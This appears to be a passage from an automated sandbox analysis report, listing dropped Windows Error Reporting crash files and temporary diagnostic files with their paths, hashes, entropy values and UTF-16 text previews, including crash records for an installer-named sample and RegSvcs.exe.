SSDEEP:	192:g+AMGgV2uRZS0E2jJRkaG+JoZOzuiFm+Z24IO8oVR:9AMGo2uRZZE2jJeahhzuiFm+Y4IO8QR
MD5:	1B561AC68F1079ADBBCCF236B0ED3889
SHA1:	321F9FECD3E8E5AB182E60184D9A0F5B42A6A259
SHA-256:	18B0B5E9844BD33D6F689AF5B10A29D705587EF29E27616816DC0B67F5D442C6
SHA-512:	85A3E129A17DF9A2C3AE4A19AF69CBB474655403C0688ADD03248481E4E04CCAD617879CA0E70FA7F5A4DB02A951CE1D776CA83D1D85786C40A2A6EBDBD17764
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.4.7.7.4.9.5.5.4.2.5.0.9.7.1.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.4.7.7.4.9.5.5.5.1.5.7.2.1.9.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.1.f.b.e.7.8.8.-.b.8.9.e.-.4.e.3.e.-.9.3.4.6.-.a.a.d.2.8.0.6.c.2.5.f.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.9.8.5.d.5.4.b.-.3.8.a.0.-.4.8.e.0.-.a.d.7.2.-.1.1.7.b.0.0.5.4.1.0.c.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.D.F.D.5...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.i.n.s.t.a.l.l.e.d._.s.e.t.t.i.n.g.s._.t.o._.i.m.p.r.o.v.e._.t.h.e._.i.n.s.t.a.l.l.a.t.i.o.n...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.8.4.-.0.0.0.1.-.0.0.1.4.-.c.8.8.2.-.b.0.3.0.1.3.3.5.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.c.2.9.7.4.0.4.7.d.3.8.b.6.7.4.9.1.c.e.d.4.1.f.2.d.0.4.2.7.b.3.0.0.0.0.0.0.0.0.!.0.0.0.0.e.f.c.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegSvcs.exe_72f739857f7d3e4474b63387679cc17f6f3f99_451a2fb0_9f83c1a2-f376-4b5c-9b96-3d2bc896af2f\Report.wer

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8557791039661601
Encrypted:	false
SSDEEP:	192:81K3k8Q5MNn0NVEHljzHCO6zuiFm+Z24IO8G:/VQ5MN0NVEHljrCfzuiFm+Y4IO8G
MD5:	16D9139F0C74A6451EE8215D41AD669B
SHA1:	9165CC09CDBB5EAAE0881576FED3DD4633B0F10A
SHA-256:	B08D808A2E510A99E1499B3BB25389FD314B6322F48944E206FDE4C69D1AC0A4
SHA-512:	7578F9E6CD1B90FBE6CFE9FF959E2F45233D833C16511D8208F9F1BECB93502A6294DE49CA84406D920AE6EE51BCA8A757B7E90BC56D575CBDA78C8A40D94EBB
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.4.7.7.4.9.5.5.4.4.3.8.8.8.1.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.4.7.7.4.9.5.5.5.0.3.2.6.3.3.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.f.8.3.c.1.a.2.-.f.3.7.6.-.4.b.5.c.-.9.b.9.6.-.3.d.2.b.c.8.9.6.a.f.2.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.4.7.7.2.b.e.f.-.6.3.0.0.-.4.c.4.4.-.8.3.8.3.-.e.4.7.d.f.8.9.3.4.3.c.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.g.S.v.c.s...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.S.v.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.b.8.-.0.0.0.1.-.0.0.1.4.-.0.f.5.2.-.a.f.3.1.1.3.3.5.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.1.9.6.9.7.7.1.b.2.f.0.2.2.f.9.a.8.6.d.7.7.a.c.4.d.4.d.2.3.9.b.e.c.d.f.0.8.d.0.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1AD6.tmp.csv

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	82570
Entropy (8bit):	3.075829462960174
Encrypted:	false
SSDEEP:	768:+d0nti1P+xnn0+/Zx5ahxKRaMeig/UGDG3uCNVnnBAxgc44t3ezz:jtmP+xnnJMqRHeiKUcG3uWVnygcdczz
MD5:	9E4F758D77CBBF80DEED81E19670431F
SHA1:	F5DB60C270BD03445A309C3C1F678D6FA1C17FC5
SHA-256:	FD50C3EAE76413AF99672C0BFFD3C69DBE785F0C16BD8C4D922374E0C9E6BB71
SHA-512:	C44070A327241C1B1327328DBB8DBD2871F9BE4B41DC7CCD4D836BF92B8C54ECAC77858964611DEEE089D7B2682D9C6834F1DE606F5430B72C95A9AD370986E5
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER275A.tmp.txt

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.688287204700974
Encrypted:	false
SSDEEP:	96:TiZYWtz4MEr3YaYFWdHhUYEZ8dtDie3LlnShwUsPO8aQZaM0uxYNIDk3:2ZDtodVyz8aQZaM0uxdDk3
MD5:	9A905593C5D33B352F393795F907C87C
SHA1:	5B8A6E11D929233DDAB27BE9D9FF2F49AAA7F39E
SHA-256:	3A44805E0FE5D2B14C1B737E8AF46423FFE53C2E606EDA2B4DD3C35D43FA6E20
SHA-512:	F1DE724DAC4CC1BE8AE547EE5489633A6137BD388C20976F6B4F46C522DD859D46348133075118EC13F7C0E6E74DA5937615D7074C2BF50B076556AC59B2108A
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2937.tmp.csv

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	84124
Entropy (8bit):	3.0719618150114174
Encrypted:	false
SSDEEP:	1536:ditwWPowJguW3MfRwv/764/5kfWVnygPlu5FBY:ditwWPowJguW3MfRwv/764/5kfWVnygD
MD5:	A4268C24C25B24A1C5273FEDAEC6B479
SHA1:	264EB52A9A83A386F53A5F6047C692526094A591
SHA-256:	833479678ADAE87957F06FE500A963AEF36A184991F6B5F24D2BFC6C61FE00D4
SHA-512:	A3C4E6145C1FB0749BF01BDEB1DFB95A8896DE312F342444A636005A8E873213CFCD93A49D9E0BE0D65FC90662FA3C730BFA6A23CF9133ABB223A406AFE89F6E
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2A22.tmp.txt

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6847054410080324
Encrypted:	false
SSDEEP:	96:TiZYWMYO5yoYhYpWQHnUYEZ/vtDi1Ip0Vw/IJlavXGMgPVIj83:2ZDQ2x9ylavXGMgPqj83
MD5:	758B5A11336A416E5B86F16C819B7530
SHA1:	3E184DBDF06999B4B3BDB653391F5605DD160330
SHA-256:	AE66A41516597D9C51A6A0281429C9711E9E20C35A5A46F6736E4826B811D98E
SHA-512:	F6DAC76DAA04AF2B9FF67F27F8236D175CCB799F3C72B092954A09A2ACEC2037CAAE67C7F9EBC83EC9353344A30A830DBDED4B2ED2E99EB605E8D1B147640E91
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2BC9.tmp.csv

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	83650
Entropy (8bit):	3.0748197934142505
Encrypted:	false
SSDEEP:	1536:RcU1tAyR3PnCuWv/Rwf/76+rFxfWVnyghE8DBBQ:RcU1tAyR3PnCuWv/Rwf/76+rFxfWVny/
MD5:	032F5FF73EA0101F31953CBE6CA1EBA6
SHA1:	1F5A5B99BE119CD5F4AB6825DB936368E6C0F5F4
SHA-256:	05C48900EC4693553DCE003B1357A95B448AE28FA47688B072CEFC029F536FA3
SHA-512:	55C7335D6A575582FF9440E4B38EBB359532C6F75FAA7A51F4DD7E7CC4C8BADD7F9A7E48CD6AD292D885DC5EAAC9B2386C6DE57971612D933C9ED74772097BEB
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2C66.tmp.txt

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6854865536599495
Encrypted:	false
SSDEEP:	96:TiZYWPDS1BLYYYuWHHLUYEZyntDiRIa0Dw/icUaxX9MtrdmxI883:2ZDPuPCS3UaxX9MpEu883
MD5:	FF9274EAB9BAA2F85DE15F7F35D01BE6
SHA1:	A72D37FF8BE8A4A623AD38E5844C08EB4BE0AB5F
SHA-256:	4732C1230969BCF8994CD7823DB3A5CCEEAA06B0BD3D61418EEACDB8A4F0F6BA
SHA-512:	7EDB7DE691E9B52C72B5D23EB4D487F3A9CDCC80293C8C916A07F1DAAE526CFDF184F0AF43CE1465B7A1F67DDBEFABD4C2A4392F9169706A6D8CDEB540B726F8
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2E3C.tmp.csv

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	84062
Entropy (8bit):	3.0739614962644524
Encrypted:	false
SSDEEP:	1536:2etryPRPKDuWvDRwh/76mrkxfWVnygmEn8By:2etryPRPKDuWvDRwh/76mrkxfWVnygmQ
MD5:	E32164199769D492D6450DB916ED56F1
SHA1:	9CA12398B5B9876D431ED111AE5583DAB1D40B8D
SHA-256:	7EC03BC8F750C1A145CCB2BC0845191DF5587AA78A26B4BA7AB484881D4C8C0C
SHA-512:	746305FEF24C96EE270D9F5C0DF20A029179CD4B42F13C4E44A2221D8B134A30F97AC8FF52FCE1A3F99A9F26654AB590429FCCC93B69854A04BD862C5BA02707
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2F76.tmp.txt

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.686251247134322
Encrypted:	false
SSDEEP:	96:TiZYW4kRP/x3Y3Y9W1sEHxUYEZU8tDiGIf0lwwUOaeX6zMLcPIl+83:2ZDDgZ7wHaeXOMLcg883
MD5:	F6F990FFE9129A6768FC4CCBAD758065
SHA1:	E9066E1FDD0BB1B56BD863AAB9E92934927BC3CF
SHA-256:	8A117BF35EBD53DC952641F752D9E76A3ED4C50DF652B8B2972FF7AD8ABFB887
SHA-512:	4DE9CF024DA9CF8D96E61C1165A5099DF3ACA7CC7B6E16E4F1F3D765031CD7A2FCCFF1E0BE05641492B307B8C1264B63886F4A67FA06E8DE8AC689CCB62FB8A1
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER31D8.tmp.csv

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	84950
Entropy (8bit):	3.072799402366973
Encrypted:	false
SSDEEP:	1536:ZmtBRPKNuxasRw4/06IAk5fWVnygCwRCeE1Bu:ZmtBRPKNuxasRw4/06IAk5fWVnygCwRD
MD5:	28D931CB3C4CC32DC7C42A4D542C4473
SHA1:	C52165D7BF5DF1A6DD1960DABC93EEE5310EB9CF
SHA-256:	10E0A220BE31FBA7D63A9D4DC0309257B7878ADFBC6AAF90BAC041A99430DF58
SHA-512:	F861F81215A76BC89F92AC23D08E14FE122F08E0587021F81B2F1E406AA8317E5C3520C6A38FDD5265E6887C6DCFEBA2C76BBCB23690A2BA29DF7E7B4EF86BBB
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER32B4.tmp.txt

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6852659956702536
Encrypted:	false
SSDEEP:	96:TiZYWYf8YshyY3YtWEH0UYEZBptDiAIU0PwEeUUbz/arcXbMuc0Il83:2ZDEAsCiaAXbMucjl83
MD5:	E11D938DD227236AA5BCEA9C11552463
SHA1:	5C62031A56D49487C11F165B394B5479B837A3EF
SHA-256:	3E1316CE02E01779B74D99F599E636BDAED67126FD48DE8DB6AC840D336BC09B
SHA-512:	33B7924F1E0473DBB1ACEB5A490A37A03D3CDD5C8EBF2991CE07C0F45348758ECF8146F7B1AFE2C4A88A4EE7BE9F797A7AAD963F41661C357B97CFFCBCDC60C2
Malicious:	false
